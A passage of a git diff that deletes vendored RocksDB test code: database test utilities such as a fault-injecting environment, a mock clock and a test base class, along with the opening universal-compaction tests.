-  virtual uint64_t NowMicros() override {
-    return (time_elapse_only_sleep_ ? 0 : target()->NowMicros()) +
-           addon_time_.load();
-  }
-
-  virtual Status DeleteFile(const std::string& fname) override {
-    delete_count_.fetch_add(1);
-    return target()->DeleteFile(fname);
-  }
-
-  Random rnd_;
-  port::Mutex rnd_mutex_;  // Lock to pretect rnd_
-
-  // sstable Sync() calls are blocked while this pointer is non-nullptr.
-  std::atomic<bool> delay_sstable_sync_;
-
-  // Drop writes on the floor while this pointer is non-nullptr.
-  std::atomic<bool> drop_writes_;
-
-  // Simulate no-space errors while this pointer is non-nullptr.
-  std::atomic<bool> no_space_;
-
-  // Simulate non-writable file system while this pointer is non-nullptr
-  std::atomic<bool> non_writable_;
-
-  // Force sync of manifest files to fail while this pointer is non-nullptr
-  std::atomic<bool> manifest_sync_error_;
-
-  // Force write to manifest files to fail while this pointer is non-nullptr
-  std::atomic<bool> manifest_write_error_;
-
-  // Force write to log files to fail while this pointer is non-nullptr
-  std::atomic<bool> log_write_error_;
-
-  // Slow down every log write, in micro-seconds.
-  std::atomic<int> log_write_slowdown_;
-
-  // Number of WAL files that are still open for write.
-  std::atomic<int> num_open_wal_file_;
-
-  bool count_random_reads_;
-  anon::AtomicCounter random_read_counter_;
-  std::atomic<size_t> random_read_bytes_counter_;
-  std::atomic<int> random_file_open_counter_;
-
-  bool count_sequential_reads_;
-  anon::AtomicCounter sequential_read_counter_;
-
-  anon::AtomicCounter sleep_counter_;
-
-  std::atomic<int64_t> bytes_written_;
-
-  std::atomic<int> sync_counter_;
-
-  std::atomic<uint32_t> non_writeable_rate_;
-
-  std::atomic<uint32_t> new_writable_count_;
-
-  std::atomic<uint32_t> non_writable_count_;
-
-  std::function<void()>* table_write_callback_;
-
-  std::atomic<int64_t> addon_time_;
-
-  std::atomic<int> delete_count_;
-
-  bool time_elapse_only_sleep_;
-
-  bool no_slowdown_;
-
-  std::atomic<bool> is_wal_sync_thread_safe_{true};
-};
-
-class MockTimeEnv : public EnvWrapper {
- public:
-  explicit MockTimeEnv(Env* base) : EnvWrapper(base) {}
-
-  virtual Status GetCurrentTime(int64_t* time) override {
-    assert(time != nullptr);
-    assert(current_time_ <=
-           static_cast<uint64_t>(std::numeric_limits<int64_t>::max()));
-    *time = static_cast<int64_t>(current_time_);
-    return Status::OK();
-  }
-
-  virtual uint64_t NowMicros() override {
-    assert(current_time_ <= std::numeric_limits<uint64_t>::max() / 1000000);
-    return current_time_ * 1000000;
-  }
-
-  virtual uint64_t NowNanos() override {
-    assert(current_time_ <= std::numeric_limits<uint64_t>::max() / 1000000000);
-    return current_time_ * 1000000000;
-  }
-
-  void set_current_time(uint64_t time) {
-    assert(time >= current_time_);
-    current_time_ = time;
-  }
-
- private:
-  uint64_t current_time_ = 0;
-};
-
-#ifndef ROCKSDB_LITE
-class OnFileDeletionListener : public EventListener {
- public:
-  OnFileDeletionListener() : matched_count_(0), expected_file_name_("") {}
-
-  void SetExpectedFileName(const std::string file_name) {
-    expected_file_name_ = file_name;
-  }
-
-  void VerifyMatchedCount(size_t expected_value) {
-    ASSERT_EQ(matched_count_, expected_value);
-  }
-
-  void OnTableFileDeleted(const TableFileDeletionInfo& info) override {
-    if (expected_file_name_ != "") {
-      ASSERT_EQ(expected_file_name_, info.file_path);
-      expected_file_name_ = "";
-      matched_count_++;
-    }
-  }
-
- private:
-  size_t matched_count_;
-  std::string expected_file_name_;
-};
-#endif
-
-// A test merge operator mimics put but also fails if one of merge operands is
-// "corrupted".
-class TestPutOperator : public MergeOperator {
- public:
-  virtual bool FullMergeV2(const MergeOperationInput& merge_in,
-                           MergeOperationOutput* merge_out) const override {
-    if (merge_in.existing_value != nullptr &&
-        *(merge_in.existing_value) == "corrupted") {
-      return false;
-    }
-    for (auto value : merge_in.operand_list) {
-      if (value == "corrupted") {
-        return false;
-      }
-    }
-    merge_out->existing_operand = merge_in.operand_list.back();
-    return true;
-  }
-
-  virtual const char* Name() const override { return "TestPutOperator"; }
-};
-
-class DBTestBase : public testing::Test {
- public:
-  // Sequence of option configurations to try
-  enum OptionConfig : int {
-    kDefault = 0,
-    kBlockBasedTableWithPrefixHashIndex = 1,
-    kBlockBasedTableWithWholeKeyHashIndex = 2,
-    kPlainTableFirstBytePrefix = 3,
-    kPlainTableCappedPrefix = 4,
-    kPlainTableCappedPrefixNonMmap = 5,
-    kPlainTableAllBytesPrefix = 6,
-    kVectorRep = 7,
-    kHashLinkList = 8,
-    kHashCuckoo = 9,
-    kMergePut = 10,
-    kFilter = 11,
-    kFullFilterWithNewTableReaderForCompactions = 12,
-    kUncompressed = 13,
-    kNumLevel_3 = 14,
-    kDBLogDir = 15,
-    kWalDirAndMmapReads = 16,
-    kManifestFileSize = 17,
-    kPerfOptions = 18,
-    kHashSkipList = 19,
-    kUniversalCompaction = 20,
-    kUniversalCompactionMultiLevel = 21,
-    kCompressedBlockCache = 22,
-    kInfiniteMaxOpenFiles = 23,
-    kxxHashChecksum = 24,
-    kFIFOCompaction = 25,
-    kOptimizeFiltersForHits = 26,
-    kRowCache = 27,
-    kRecycleLogFiles = 28,
-    kConcurrentSkipList = 29,
-    kPipelinedWrite = 30,
-    kConcurrentWALWrites = 31,
-    kEnd = 32,
-    kDirectIO = 33,
-    kLevelSubcompactions = 34,
-    kUniversalSubcompactions = 35,
-    kBlockBasedTableWithIndexRestartInterval = 36,
-    kBlockBasedTableWithPartitionedIndex = 37,
-    kPartitionedFilterWithNewTableReaderForCompactions = 38,
-  };
-
- public:
-  std::string dbname_;
-  std::string alternative_wal_dir_;
-  std::string alternative_db_log_dir_;
-  MockEnv* mem_env_;
-  Env* encrypted_env_;
-  SpecialEnv* env_;
-  DB* db_;
-  std::vector<ColumnFamilyHandle*> handles_;
-
-  int option_config_;
-  Options last_options_;
-
-  // Skip some options, as they may not be applicable to a specific test.
-  // To add more skip constants, use values 4, 8, 16, etc.
-  enum OptionSkip {
-    kNoSkip = 0,
-    kSkipDeletesFilterFirst = 1,
-    kSkipUniversalCompaction = 2,
-    kSkipMergePut = 4,
-    kSkipPlainTable = 8,
-    kSkipHashIndex = 16,
-    kSkipNoSeekToLast = 32,
-    kSkipHashCuckoo = 64,
-    kSkipFIFOCompaction = 128,
-    kSkipMmapReads = 256,
-  };
-
-  explicit DBTestBase(const std::string path);
-
-  ~DBTestBase();
-
-  static std::string RandomString(Random* rnd, int len) {
-    std::string r;
-    test::RandomString(rnd, len, &r);
-    return r;
-  }
-
-  static std::string Key(int i) {
-    char buf[100];
-    snprintf(buf, sizeof(buf), "key%06d", i);
-    return std::string(buf);
-  }
-
-  static bool ShouldSkipOptions(int option_config, int skip_mask = kNoSkip);
-
-  // Switch to a fresh database with the next option configuration to
-  // test.  Return false if there are no more configurations to test.
-  bool ChangeOptions(int skip_mask = kNoSkip);
-
-  // Switch between different compaction styles.
-  bool ChangeCompactOptions();
-
-  // Switch between different WAL-realted options.
-  bool ChangeWalOptions();
-
-  // Switch between different filter policy
-  // Jump from kDefault to kFilter to kFullFilter
-  bool ChangeFilterOptions();
-
-  // Return the current option configuration.
-  Options CurrentOptions(const anon::OptionsOverride& options_override =
-                             anon::OptionsOverride()) const;
-
-  Options CurrentOptions(const Options& default_options,
-                         const anon::OptionsOverride& options_override =
-                             anon::OptionsOverride()) const;
-
-  static Options GetDefaultOptions();
-
-  Options GetOptions(int option_config,
-                     const Options& default_options = GetDefaultOptions(),
-                     const anon::OptionsOverride& options_override =
-                         anon::OptionsOverride()) const;
-
-  DBImpl* dbfull() { return reinterpret_cast<DBImpl*>(db_); }
-
-  void CreateColumnFamilies(const std::vector<std::string>& cfs,
-                            const Options& options);
-
-  void CreateAndReopenWithCF(const std::vector<std::string>& cfs,
-                             const Options& options);
-
-  void ReopenWithColumnFamilies(const std::vector<std::string>& cfs,
-                                const std::vector<Options>& options);
-
-  void ReopenWithColumnFamilies(const std::vector<std::string>& cfs,
-                                const Options& options);
-
-  Status TryReopenWithColumnFamilies(const std::vector<std::string>& cfs,
-                                     const std::vector<Options>& options);
-
-  Status TryReopenWithColumnFamilies(const std::vector<std::string>& cfs,
-                                     const Options& options);
-
-  void Reopen(const Options& options);
-
-  void Close();
-
-  void DestroyAndReopen(const Options& options);
-
-  void Destroy(const Options& options);
-
-  Status ReadOnlyReopen(const Options& options);
-
-  Status TryReopen(const Options& options);
-
-  bool IsDirectIOSupported();
-
-  bool IsMemoryMappedAccessSupported() const;
-
-  Status Flush(int cf = 0);
-
-  Status Put(const Slice& k, const Slice& v, WriteOptions wo = WriteOptions());
-
-  Status Put(int cf, const Slice& k, const Slice& v,
-             WriteOptions wo = WriteOptions());
-
-  Status Merge(const Slice& k, const Slice& v,
-               WriteOptions wo = WriteOptions());
-
-  Status Merge(int cf, const Slice& k, const Slice& v,
-               WriteOptions wo = WriteOptions());
-
-  Status Delete(const std::string& k);
-
-  Status Delete(int cf, const std::string& k);
-
-  Status SingleDelete(const std::string& k);
-
-  Status SingleDelete(int cf, const std::string& k);
-
-  std::string Get(const std::string& k, const Snapshot* snapshot = nullptr);
-
-  std::string Get(int cf, const std::string& k,
-                  const Snapshot* snapshot = nullptr);
-
-  Status Get(const std::string& k, PinnableSlice* v);
-
-  uint64_t GetNumSnapshots();
-
-  uint64_t GetTimeOldestSnapshots();
-
-  // Return a string that contains all key,value pairs in order,
-  // formatted like "(k1->v1)(k2->v2)".
-  std::string Contents(int cf = 0);
-
-  std::string AllEntriesFor(const Slice& user_key, int cf = 0);
-
-#ifndef ROCKSDB_LITE
-  int NumSortedRuns(int cf = 0);
-
-  uint64_t TotalSize(int cf = 0);
-
-  uint64_t SizeAtLevel(int level);
-
-  size_t TotalLiveFiles(int cf = 0);
-
-  size_t CountLiveFiles();
-#endif  // ROCKSDB_LITE
-
-  int NumTableFilesAtLevel(int level, int cf = 0);
-
-  double CompressionRatioAtLevel(int level, int cf = 0);
-
-  int TotalTableFiles(int cf = 0, int levels = -1);
-
-  // Return spread of files per level
-  std::string FilesPerLevel(int cf = 0);
-
-  size_t CountFiles();
-
-  uint64_t Size(const Slice& start, const Slice& limit, int cf = 0);
-
-  void Compact(int cf, const Slice& start, const Slice& limit,
-               uint32_t target_path_id);
-
-  void Compact(int cf, const Slice& start, const Slice& limit);
-
-  void Compact(const Slice& start, const Slice& limit);
-
-  // Do n memtable compactions, each of which produces an sstable
-  // covering the range [small,large].
-  void MakeTables(int n, const std::string& small, const std::string& large,
-                  int cf = 0);
-
-  // Prevent pushing of new sstables into deeper levels by adding
-  // tables that cover a specified range to all levels.
-  void FillLevels(const std::string& smallest, const std::string& largest,
-                  int cf);
-
-  void MoveFilesToLevel(int level, int cf = 0);
-
-  void DumpFileCounts(const char* label);
-
-  std::string DumpSSTableList();
-
-  void GetSstFiles(std::string path, std::vector<std::string>* files);
-
-  int GetSstFileCount(std::string path);
-
-  // this will generate non-overlapping files since it keeps increasing key_idx
-  void GenerateNewFile(Random* rnd, int* key_idx, bool nowait = false);
-
-  void GenerateNewFile(int fd, Random* rnd, int* key_idx, bool nowait = false);
-
-  static const int kNumKeysByGenerateNewRandomFile;
-  static const int KNumKeysByGenerateNewFile = 100;
-
-  void GenerateNewRandomFile(Random* rnd, bool nowait = false);
-
-  std::string IterStatus(Iterator* iter);
-
-  Options OptionsForLogIterTest();
-
-  std::string DummyString(size_t len, char c = 'a');
-
-  void VerifyIterLast(std::string expected_key, int cf = 0);
-
-  // Used to test InplaceUpdate
-
-  // If previous value is nullptr or delta is > than previous value,
-  //   sets newValue with delta
-  // If previous value is not empty,
-  //   updates previous value with 'b' string of previous value size - 1.
-  static UpdateStatus updateInPlaceSmallerSize(char* prevValue,
-                                               uint32_t* prevSize, Slice delta,
-                                               std::string* newValue);
-
-  static UpdateStatus updateInPlaceSmallerVarintSize(char* prevValue,
-                                                     uint32_t* prevSize,
-                                                     Slice delta,
-                                                     std::string* newValue);
-
-  static UpdateStatus updateInPlaceLargerSize(char* prevValue,
-                                              uint32_t* prevSize, Slice delta,
-                                              std::string* newValue);
-
-  static UpdateStatus updateInPlaceNoAction(char* prevValue, uint32_t* prevSize,
-                                            Slice delta, std::string* newValue);
-
-  // Utility method to test InplaceUpdate
-  void validateNumberOfEntries(int numValues, int cf = 0);
-
-  void CopyFile(const std::string& source, const std::string& destination,
-                uint64_t size = 0);
-
-  std::unordered_map<std::string, uint64_t> GetAllSSTFiles(
-      uint64_t* total_size = nullptr);
-
-  std::vector<std::uint64_t> ListTableFiles(Env* env, const std::string& path);
-
-  void VerifyDBFromMap(
-      std::map<std::string, std::string> true_data,
-      size_t* total_reads_res = nullptr, bool tailing_iter = false,
-      std::map<std::string, Status> status = std::map<std::string, Status>());
-
-  void VerifyDBInternal(
-      std::vector<std::pair<std::string, std::string>> true_data);
-
-#ifndef ROCKSDB_LITE
-  uint64_t GetNumberOfSstFilesForColumnFamily(DB* db,
-                                              std::string column_family_name);
-#endif  // ROCKSDB_LITE
-
-  uint64_t TestGetTickerCount(const Options& options, Tickers ticker_type) {
-    return options.statistics->getTickerCount(ticker_type);
-  }
-};
-
-}  // namespace rocksdb
diff --git a/thirdparty/rocksdb/db/db_universal_compaction_test.cc b/thirdparty/rocksdb/db/db_universal_compaction_test.cc
deleted file mode 100644
index 58fda80..0000000
--- a/thirdparty/rocksdb/db/db_universal_compaction_test.cc
+++ /dev/null
@@ -1,1589 +0,0 @@
-//  Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-//
-// Copyright (c) 2011 The LevelDB Authors. All rights reserved.
-// Use of this source code is governed by a BSD-style license that can be
-// found in the LICENSE file. See the AUTHORS file for names of contributors.
-
-#include "db/db_test_util.h"
-#include "port/stack_trace.h"
-#if !defined(ROCKSDB_LITE)
-#include "util/sync_point.h"
-
-namespace rocksdb {
-
-static std::string CompressibleString(Random* rnd, int len) {
-  std::string r;
-  test::CompressibleString(rnd, 0.8, len, &r);
-  return r;
-}
-
-class DBTestUniversalCompactionBase
-    : public DBTestBase,
-      public ::testing::WithParamInterface<std::tuple<int, bool>> {
- public:
-  explicit DBTestUniversalCompactionBase(
-      const std::string& path) : DBTestBase(path) {}
-  virtual void SetUp() override {
-    num_levels_ = std::get<0>(GetParam());
-    exclusive_manual_compaction_ = std::get<1>(GetParam());
-  }
-  int num_levels_;
-  bool exclusive_manual_compaction_;
-};
-
-class DBTestUniversalCompaction : public DBTestUniversalCompactionBase {
- public:
-  DBTestUniversalCompaction() :
-      DBTestUniversalCompactionBase("/db_universal_compaction_test") {}
-};
-
-namespace {
-void VerifyCompactionResult(
-    const ColumnFamilyMetaData& cf_meta,
-    const std::set<std::string>& overlapping_file_numbers) {
-#ifndef NDEBUG
-  for (auto& level : cf_meta.levels) {
-    for (auto& file : level.files) {
-      assert(overlapping_file_numbers.find(file.name) ==
-             overlapping_file_numbers.end());
-    }
-  }
-#endif
-}
-
-class KeepFilter : public CompactionFilter {
- public:
-  virtual bool Filter(int level, const Slice& key, const Slice& value,
-                      std::string* new_value, bool* value_changed) const
-      override {
-    return false;
-  }
-
-  virtual const char* Name() const override { return "KeepFilter"; }
-};
-
-class KeepFilterFactory : public CompactionFilterFactory {
- public:
-  explicit KeepFilterFactory(bool check_context = false)
-      : check_context_(check_context) {}
-
-  virtual std::unique_ptr<CompactionFilter> CreateCompactionFilter(
-      const CompactionFilter::Context& context) override {
-    if (check_context_) {
-      EXPECT_EQ(expect_full_compaction_.load(), context.is_full_compaction);
-      EXPECT_EQ(expect_manual_compaction_.load(), context.is_manual_compaction);
-    }
-    return std::unique_ptr<CompactionFilter>(new KeepFilter());
-  }
-
-  virtual const char* Name() const override { return "KeepFilterFactory"; }
-  bool check_context_;
-  std::atomic_bool expect_full_compaction_;
-  std::atomic_bool expect_manual_compaction_;
-};
-
-class DelayFilter : public CompactionFilter {
- public:
-  explicit DelayFilter(DBTestBase* d) : db_test(d) {}
-  virtual bool Filter(int level, const Slice& key, const Slice& value,
-                      std::string* new_value,
-                      bool* value_changed) const override {
-    db_test->env_->addon_time_.fetch_add(1000);
-    return true;
-  }
-
-  virtual const char* Name() const override { return "DelayFilter"; }
-
- private:
-  DBTestBase* db_test;
-};
-
-class DelayFilterFactory : public CompactionFilterFactory {
- public:
-  explicit DelayFilterFactory(DBTestBase* d) : db_test(d) {}
-  virtual std::unique_ptr<CompactionFilter> CreateCompactionFilter(
-      const CompactionFilter::Context& context) override {
-    return std::unique_ptr<CompactionFilter>(new DelayFilter(db_test));
-  }
-
-  virtual const char* Name() const override { return "DelayFilterFactory"; }
-
- private:
-  DBTestBase* db_test;
-};
-}  // namespace
-
-// Make sure we don't trigger a problem if the trigger condtion is given
-// to be 0, which is invalid.
-TEST_P(DBTestUniversalCompaction, UniversalCompactionSingleSortedRun) {
-  Options options = CurrentOptions();
-
-  options.compaction_style = kCompactionStyleUniversal;
-  options.num_levels = num_levels_;
-  // Config universal compaction to always compact to one single sorted run.
-  options.level0_file_num_compaction_trigger = 0;
-  options.compaction_options_universal.size_ratio = 10;
-  options.compaction_options_universal.min_merge_width = 2;
-  options.compaction_options_universal.max_size_amplification_percent = 0;
-
-  options.write_buffer_size = 105 << 10;  // 105KB
-  options.arena_block_size = 4 << 10;
-  options.target_file_size_base = 32 << 10;  // 32KB
-  // trigger compaction if there are >= 4 files
-  KeepFilterFactory* filter = new KeepFilterFactory(true);
-  filter->expect_manual_compaction_.store(false);
-  options.compaction_filter_factory.reset(filter);
-
-  DestroyAndReopen(options);
-  ASSERT_EQ(1, db_->GetOptions().level0_file_num_compaction_trigger);
-
-  Random rnd(301);
-  int key_idx = 0;
-
-  filter->expect_full_compaction_.store(true);
-
-  for (int num = 0; num < 16; num++) {
-    // Write 100KB file. And immediately it should be compacted to one file.
-    GenerateNewFile(&rnd, &key_idx);
-    dbfull()->TEST_WaitForCompact();
-    ASSERT_EQ(NumSortedRuns(0), 1);
-  }
-  ASSERT_OK(Put(Key(key_idx), ""));
-  dbfull()->TEST_WaitForCompact();
-  ASSERT_EQ(NumSortedRuns(0), 1);
-}
-
-TEST_P(DBTestUniversalCompaction, OptimizeFiltersForHits) {
-  Options options = CurrentOptions();
-  options.compaction_style = kCompactionStyleUniversal;
-  options.compaction_options_universal.size_ratio = 5;
-  options.num_levels = num_levels_;
-  options.write_buffer_size = 105 << 10;  // 105KB
-  options.arena_block_size = 4 << 10;
-  options.target_file_size_base = 32 << 10;  // 32KB
-  // trigger compaction if there are >= 4 files
-  options.level0_file_num_compaction_trigger = 4;
-  BlockBasedTableOptions bbto;
-  bbto.cache_index_and_filter_blocks = true;
-  bbto.filter_policy.reset(NewBloomFilterPolicy(10, false));
-  bbto.whole_key_filtering = true;
-  options.table_factory.reset(NewBlockBasedTableFactory(bbto));
-  options.optimize_filters_for_hits = true;
-  options.statistics = rocksdb::CreateDBStatistics();
-  options.memtable_factory.reset(new SpecialSkipListFactory(3));
-
-  DestroyAndReopen(options);
-
-  // block compaction from happening
-  env_->SetBackgroundThreads(1, Env::LOW);
-  test::SleepingBackgroundTask sleeping_task_low;
-  env_->Schedule(&test::SleepingBackgroundTask::DoSleepTask, &sleeping_task_low,
-                 Env::Priority::LOW);
-
-  for (int num = 0; num < options.level0_file_num_compaction_trigger; num++) {
-    Put(Key(num * 10), "val");
-    if (num) {
-      dbfull()->TEST_WaitForFlushMemTable();
-    }
-    Put(Key(30 + num * 10), "val");
-    Put(Key(60 + num * 10), "val");
-  }
-  Put("", "");
-  dbfull()->TEST_WaitForFlushMemTable();
-
-  // Query set of non existing keys
-  for (int i = 5; i < 90; i += 10) {
-    ASSERT_EQ(Get(Key(i)), "NOT_FOUND");
-  }
-
-  // Make sure bloom filter is used at least once.
-  ASSERT_GT(TestGetTickerCount(options, BLOOM_FILTER_USEFUL), 0);
-  auto prev_counter = TestGetTickerCount(options, BLOOM_FILTER_USEFUL);
-
-  // Make sure bloom filter is used for all but the last L0 file when looking
-  // up a non-existent key that's in the range of all L0 files.
-  ASSERT_EQ(Get(Key(35)), "NOT_FOUND");
-  ASSERT_EQ(prev_counter + NumTableFilesAtLevel(0) - 1,
-            TestGetTickerCount(options, BLOOM_FILTER_USEFUL));
-  prev_counter = TestGetTickerCount(options, BLOOM_FILTER_USEFUL);
-
-  // Unblock compaction and wait it for happening.
-  sleeping_task_low.WakeUp();
-  dbfull()->TEST_WaitForCompact();
-
-  // The same queries will not trigger bloom filter
-  for (int i = 5; i < 90; i += 10) {
-    ASSERT_EQ(Get(Key(i)), "NOT_FOUND");
-  }
-  ASSERT_EQ(prev_counter, TestGetTickerCount(options, BLOOM_FILTER_USEFUL));
-}
-
-// TODO(kailiu) The tests on UniversalCompaction has some issues:
-//  1. A lot of magic numbers ("11" or "12").
-//  2. Made assumption on the memtable flush conditions, which may change from
-//     time to time.
-TEST_P(DBTestUniversalCompaction, UniversalCompactionTrigger) {
-  Options options;
-  options.compaction_style = kCompactionStyleUniversal;
-  options.compaction_options_universal.size_ratio = 5;
-  options.num_levels = num_levels_;
-  options.write_buffer_size = 105 << 10;  // 105KB
-  options.arena_block_size = 4 << 10;
-  options.target_file_size_base = 32 << 10;  // 32KB
-  // trigger compaction if there are >= 4 files
-  options.level0_file_num_compaction_trigger = 4;
-  KeepFilterFactory* filter = new KeepFilterFactory(true);
-  filter->expect_manual_compaction_.store(false);
-  options.compaction_filter_factory.reset(filter);
-
-  options = CurrentOptions(options);
-  DestroyAndReopen(options);
-  CreateAndReopenWithCF({"pikachu"}, options);
-
-  rocksdb::SyncPoint::GetInstance()->SetCallBack(
-      "DBTestWritableFile.GetPreallocationStatus", [&](void* arg) {
-        ASSERT_TRUE(arg != nullptr);
-        size_t preallocation_size = *(static_cast<size_t*>(arg));
-        if (num_levels_ > 3) {
-          ASSERT_LE(preallocation_size, options.target_file_size_base * 1.1);
-        }
-      });
-  rocksdb::SyncPoint::GetInstance()->EnableProcessing();
-
-  Random rnd(301);
-  int key_idx = 0;
-
-  filter->expect_full_compaction_.store(true);
-  // Stage 1:
-  //   Generate a set of files at level 0, but don't trigger level-0
-  //   compaction.
-  for (int num = 0; num < options.level0_file_num_compaction_trigger - 1;
-       num++) {
-    // Write 100KB
-    GenerateNewFile(1, &rnd, &key_idx);
-  }
-
-  // Generate one more file at level-0, which should trigger level-0
-  // compaction.
-  GenerateNewFile(1, &rnd, &key_idx);
-  // Suppose each file flushed from mem table has size 1. Now we compact
-  // (level0_file_num_compaction_trigger+1)=4 files and should have a big
-  // file of size 4.
-  ASSERT_EQ(NumSortedRuns(1), 1);
-
-  // Stage 2:
-  //   Now we have one file at level 0, with size 4. We also have some data in
-  //   mem table. Let's continue generating new files at level 0, but don't
-  //   trigger level-0 compaction.
-  //   First, clean up memtable before inserting new data. This will generate
-  //   a level-0 file, with size around 0.4 (according to previously written
-  //   data amount).
-  filter->expect_full_compaction_.store(false);
-  ASSERT_OK(Flush(1));
-  for (int num = 0; num < options.level0_file_num_compaction_trigger - 3;
-       num++) {
-    GenerateNewFile(1, &rnd, &key_idx);
-    ASSERT_EQ(NumSortedRuns(1), num + 3);
-  }
-
-  // Generate one more file at level-0, which should trigger level-0
-  // compaction.
-  GenerateNewFile(1, &rnd, &key_idx);
-  // Before compaction, we have 4 files at level 0, with size 4, 0.4, 1, 1.
-  // After compaction, we should have 2 files, with size 4, 2.4.
-  ASSERT_EQ(NumSortedRuns(1), 2);
-
-  // Stage 3:
-  //   Now we have 2 files at level 0, with size 4 and 2.4. Continue
-  //   generating new files at level 0.
-  for (int num = 0; num < options.level0_file_num_compaction_trigger - 3;
-       num++) {
-    GenerateNewFile(1, &rnd, &key_idx);
-    ASSERT_EQ(NumSortedRuns(1), num + 3);
-  }
-
-  // Generate one more file at level-0, which should trigger level-0
-  // compaction.
-  GenerateNewFile(1, &rnd, &key_idx);
-  // Before compaction, we have 4 files at level 0, with size 4, 2.4, 1, 1.
-  // After compaction, we should have 3 files, with size 4, 2.4, 2.
-  ASSERT_EQ(NumSortedRuns(1), 3);
-
-  // Stage 4:
-  //   Now we have 3 files at level 0, with size 4, 2.4, 2. Let's generate a
-  //   new file of size 1.
-  GenerateNewFile(1, &rnd, &key_idx);
-  dbfull()->TEST_WaitForCompact();
-  // Level-0 compaction is triggered, but no file will be picked up.
-  ASSERT_EQ(NumSortedRuns(1), 4);
-
-  // Stage 5:
-  //   Now we have 4 files at level 0, with size 4, 2.4, 2, 1. Let's generate
-  //   a new file of size 1.
-  filter->expect_full_compaction_.store(true);
-  GenerateNewFile(1, &rnd, &key_idx);
-  dbfull()->TEST_WaitForCompact();
-  // All files at level 0 will be compacted into a single one.
-  ASSERT_EQ(NumSortedRuns(1), 1);
-
-  rocksdb::SyncPoint::GetInstance()->DisableProcessing();
-}
-
-TEST_P(DBTestUniversalCompaction, UniversalCompactionSizeAmplification) {
-  Options options = CurrentOptions();
-  options.compaction_style = kCompactionStyleUniversal;
-  options.num_levels = num_levels_;
-  options.write_buffer_size = 100 << 10;     // 100KB
-  options.target_file_size_base = 32 << 10;  // 32KB
-  options.level0_file_num_compaction_trigger = 3;
-  DestroyAndReopen(options);
-  CreateAndReopenWithCF({"pikachu"}, options);
-
-  // Trigger compaction if size amplification exceeds 110%
-  options.compaction_options_universal.max_size_amplification_percent = 110;
-  options = CurrentOptions(options);
-  ReopenWithColumnFamilies({"default", "pikachu"}, options);
-
-  Random rnd(301);
-  int key_idx = 0;
-
-  //   Generate two files in Level 0. Both files are approx the same size.
-  for (int num = 0; num < options.level0_file_num_compaction_trigger - 1;
-       num++) {
-    // Write 110KB (11 values, each 10K)
-    for (int i = 0; i < 11; i++) {
-      ASSERT_OK(Put(1, Key(key_idx), RandomString(&rnd, 10000)));
-      key_idx++;
-    }
-    dbfull()->TEST_WaitForFlushMemTable(handles_[1]);
-    ASSERT_EQ(NumSortedRuns(1), num + 1);
-  }
-  ASSERT_EQ(NumSortedRuns(1), 2);
-
-  // Flush whatever is remaining in memtable. This is typically
-  // small, which should not trigger size ratio based compaction
-  // but will instead trigger size amplification.
-  ASSERT_OK(Flush(1));
-
-  dbfull()->TEST_WaitForCompact();
-
-  // Verify that size amplification did occur
-  ASSERT_EQ(NumSortedRuns(1), 1);
-}
-
-TEST_P(DBTestUniversalCompaction, CompactFilesOnUniversalCompaction) {
-  const int kTestKeySize = 16;
-  const int kTestValueSize = 984;
-  const int kEntrySize = kTestKeySize + kTestValueSize;
-  const int kEntriesPerBuffer = 10;
-
-  ChangeCompactOptions();
-  Options options;
-  options.create_if_missing = true;
-  options.compaction_style = kCompactionStyleLevel;
-  options.num_levels = 1;
-  options.target_file_size_base = options.write_buffer_size;
-  options.compression = kNoCompression;
-  options = CurrentOptions(options);
-  options.write_buffer_size = kEntrySize * kEntriesPerBuffer;
-  CreateAndReopenWithCF({"pikachu"}, options);
-  ASSERT_EQ(options.compaction_style, kCompactionStyleUniversal);
-  Random rnd(301);
-  for (int key = 1024 * kEntriesPerBuffer; key >= 0; --key) {
-    ASSERT_OK(Put(1, ToString(key), RandomString(&rnd, kTestValueSize)));
-  }
-  dbfull()->TEST_WaitForFlushMemTable(handles_[1]);
-  dbfull()->TEST_WaitForCompact();
-  ColumnFamilyMetaData cf_meta;
-  dbfull()->GetColumnFamilyMetaData(handles_[1], &cf_meta);
-  std::vector<std::string> compaction_input_file_names;
-  for (auto file : cf_meta.levels[0].files) {
-    if (rnd.OneIn(2)) {
-      compaction_input_file_names.push_back(file.name);
-    }
-  }
-
-  if (compaction_input_file_names.size() == 0) {
-    compaction_input_file_names.push_back(
-        cf_meta.levels[0].files[0].name);
-  }
-
-  // expect fail since universal compaction only allow L0 output
-  ASSERT_FALSE(dbfull()
-                   ->CompactFiles(CompactionOptions(), handles_[1],
-                                  compaction_input_file_names, 1)
-                   .ok());
-
-  // expect ok and verify the compacted files no longer exist.
-  ASSERT_OK(dbfull()->CompactFiles(
-      CompactionOptions(), handles_[1],
-      compaction_input_file_names, 0));
-
-  dbfull()->GetColumnFamilyMetaData(handles_[1], &cf_meta);
-  VerifyCompactionResult(
-      cf_meta,
-      std::set<std::string>(compaction_input_file_names.begin(),
-          compaction_input_file_names.end()));
-
-  compaction_input_file_names.clear();
-
-  // Pick the first and the last file, expect everything is
-  // compacted into one single file.
-  compaction_input_file_names.push_back(
-      cf_meta.levels[0].files[0].name);
-  compaction_input_file_names.push_back(
-      cf_meta.levels[0].files[
-          cf_meta.levels[0].files.size() - 1].name);
-  ASSERT_OK(dbfull()->CompactFiles(
-      CompactionOptions(), handles_[1],
-      compaction_input_file_names, 0));
-
-  dbfull()->GetColumnFamilyMetaData(handles_[1], &cf_meta);
-  ASSERT_EQ(cf_meta.levels[0].files.size(), 1U);
-}
-
-TEST_P(DBTestUniversalCompaction, UniversalCompactionTargetLevel) {
-  Options options = CurrentOptions();
-  options.compaction_style = kCompactionStyleUniversal;
-  options.write_buffer_size = 100 << 10;     // 100KB
-  options.num_levels = 7;
-  options.disable_auto_compactions = true;
-  DestroyAndReopen(options);
-
-  // Generate 3 overlapping files
-  Random rnd(301);
-  for (int i = 0; i < 210; i++) {
-    ASSERT_OK(Put(Key(i), RandomString(&rnd, 100)));
-  }
-  ASSERT_OK(Flush());
-
-  for (int i = 200; i < 300; i++) {
-    ASSERT_OK(Put(Key(i), RandomString(&rnd, 100)));
-  }
-  ASSERT_OK(Flush());
-
-  for (int i = 250; i < 260; i++) {
-    ASSERT_OK(Put(Key(i), RandomString(&rnd, 100)));
-  }
-  ASSERT_OK(Flush());
-
-  ASSERT_EQ("3", FilesPerLevel(0));
-  // Compact all files into 1 file and put it in L4
-  CompactRangeOptions compact_options;
